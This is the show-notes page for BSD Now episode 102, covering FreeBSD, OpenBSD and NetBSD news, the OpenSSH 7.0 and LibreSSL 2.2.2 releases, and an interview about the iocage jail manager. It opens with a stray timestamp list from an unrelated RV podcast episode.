36:39 MaxxFi Standard (includes CradlePoint router plus dual Wilson boosters and antennas) (~$1700 — Score: C+)
53:50 Best RV internet options for the DIYer ~ $380
59:39 Part 2: Our solar power setup
1:01:00 Our goals for solar power
1:03:20 Expectation hardware needed
1:04:55 What did we install?
1:12:06 Solar power success!
1:14:26 In a perfect world
1:17:48 Parts list
1:20:26 Q&A

May Contain ZFS | BSD Now 102 https://original.jupiterbroadcasting.net/86482/may-contain-zfs-bsd-now-102/ Thu, 13 Aug 2015 10:05:32 +0000 https://original.jupiterbroadcasting.net/?p=86482 This week on the show, we’ll be talking with Peter Toth. He’s got a jail management system called “iocage” that’s been getting pretty popular recently. Have we finally found a replacement for ezjail? We’ll see how it stacks up. Thanks to: Get Paid to Write for DigitalOcean Direct Download: Video | HD Video | MP3 […]


This week on the show, we’ll be talking with Peter Toth. He’s got a jail management system called “iocage” that’s been getting pretty popular recently. Have we finally found a replacement for ezjail? We’ll see how it stacks up.

Thanks to:

DigitalOcean

iXsystems

Tarsnap


– Show Notes: –

Headlines

FreeBSD on Olimex RT5350F-OLinuXino

  • If you haven’t heard of the RT5350F-OLinuXino-EVB, you’re not alone (actually, we probably couldn’t even remember the name if we did know about it)
  • It’s a small board with a MIPS CPU, two ethernet ports, wireless support and… 32MB of RAM
  • This blog series documents installing FreeBSD on the device, but it is quite a DIY setup at the moment
  • In part two of the series, he talks about the GPIO and how you can configure it
  • Part three is still in the works, so check the site later on for further progress and info

The modern OpenBSD home router

  • In a new series of blog posts, one guy takes you through the process of building an OpenBSD-based gateway for his home network
  • “It’s no secret that most consumer routers ship with software that’s flaky at best, and prohibitively insecure at worst”
  • Armed with a 600MHz Pentium III CPU, he shows the process of setting up basic NAT, firewalling and even getting hostap mode working for wireless
  • This guide also covers PPP and IPv6, in case you have those requirements
  • In a similar but unrelated series, another user does a similar thing – his post also includes details on reusing your consumer router as a wireless bridge
  • He also has a separate post for setting up an IPsec VPN on the router

NetBSD at Open Source Conference 2015 Kansai

  • The Japanese NetBSD users group has teamed up with the Kansai BSD users group and Nagoya BSD users group to invade another conference
  • They had NetBSD running on all the usual (unusual?) devices, but some of the other BSDs also got a chance to shine at the event
  • Last time they mostly had ARM devices, but this time the centerpiece was an OMRON LUNA88k
  • They had at least one FreeBSD and OpenBSD device, and at least one NetBSD device even had Adobe Flash running on it
  • And what conference would be complete without an LED-powered towel

OpenSSH 7.0 released

  • The OpenSSH team has just finished up the 7.0 release, and the focus this time is deprecating legacy code
  • SSHv1 support is disabled, the 1024-bit diffie-hellman-group1-sha1 key exchange is disabled and the v00 certificate format authentication is disabled
  • The syntax for permitting root logins has been changed: the option is now called “prohibit-password” instead of “without-password” (root can log in, but only with keys), and all interactive authentication methods for root are also disabled by default now
  • If you’re using an older configuration file, the “without-password” option still works, so no change is required
  • You can now control which public key types are available for authentication, as well as control which public key types are offered for host authentications
  • Various bug fixes and documentation improvements are also included
  • Aside from the keyboard-interactive and PAM-related bugs, this release includes one minor security fix: TTY permissions were too open, so users could write messages to other logged in users
  • In the next release, even more deprecation is planned: RSA keys will be refused if they’re under 1024 bits, CBC-based ciphers will be disabled and the MD5 HMAC will also be disabled

Interview – Peter Toth – peter.toth198@gmail.com / @pannonp

Containment with iocage


News Roundup

More c2k15 reports

  • A few more hackathon reports from c2k15 in Calgary are still slowly trickling in
  • Alexander Bluhm’s up first, and he continued improving OpenBSD’s regression test suite (this ensures that no changes accidentally break existing things)
  • He also worked on syslogd, completing the TCP input code – the syslogd in 5.8 will have TLS support for secure remote logging
  • Renato Westphal sent in a report of his very first hackathon
  • He finished up the VPLS implementation and worked on EIGRP (which is explained in the report) – the end result is that OpenBSD will be more easily deployable in a Cisco-heavy network
  • Philip Guenther also wrote in, getting some very technical and low-level stuff done at the hackathon
  • His report opens with “First came a diff to move the grabbing of the kernel lock for soft-interrupts from the ASM stubs to the C routine so that mere mortals can actually push it around further to reduce locking.” – not exactly beginner stuff
  • There were also some C-state, suspend/resume and general ACPI improvements committed, and he gives a long list of random other bits he worked on as well

FreeBSD jails, the hard way

  • As you learned from our interview this week, there’s quite a selection of tools available to manage your jails
  • This article takes the opposite approach, using only the tools in the base system: ZFS, nullfs and jail.conf
  • Unlike with iocage, ZFS isn’t actually a requirement for this method
  • If you are using it, though, you can make use of snapshots for making template jails

OpenSSH hardware tokens

  • We’ve talked about a number of ways to do two-factor authentication with SSH, but what if you want it on both the client and server?
  • This blog post will show you how to use a hardware token as a second authentication factor, for the “something you know, something you have” security model
  • It takes you through from start to finish: formatting the token, generating keys, getting it integrated with sshd
  • Most of this will apply to any OS that can run ssh, and the token used in the example can be found online for pretty cheap too

LibreSSL 2.2.2 released

  • The LibreSSL team has released version 2.2.2, which signals the end of the 5.8 development cycle and includes many fixes
  • At the c2k15 hackathon, developers uncovered dozens of problems in the OpenSSL codebase with the Coverity code scanner, and this release incorporates all those: dead code, memory leaks, logic errors (which, by the way, you really don’t want in a crypto tool…) and much more
  • SSLv3 support was removed from the “openssl” command, and only a few other SSLv3 bits remain – once workarounds are found for ports that specifically depend on it, it’ll be removed completely
  • Various other small improvements were made: DH params are now 2048 bits by default, more old workarounds removed, cmake support added, etc
  • It’ll be in 5.8 (due out earlier than usual) and it’s in the FreeBSD ports tree as well

Feedback/Questions


  • Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv
  • BSD Now T-shirts are now available to preorder, and will be shipping in September (you have until the end of August to place an order, then they’re gone)
  • Next week’s episode will be a shorter prerecorded one, since Allan’s going to BSDCam
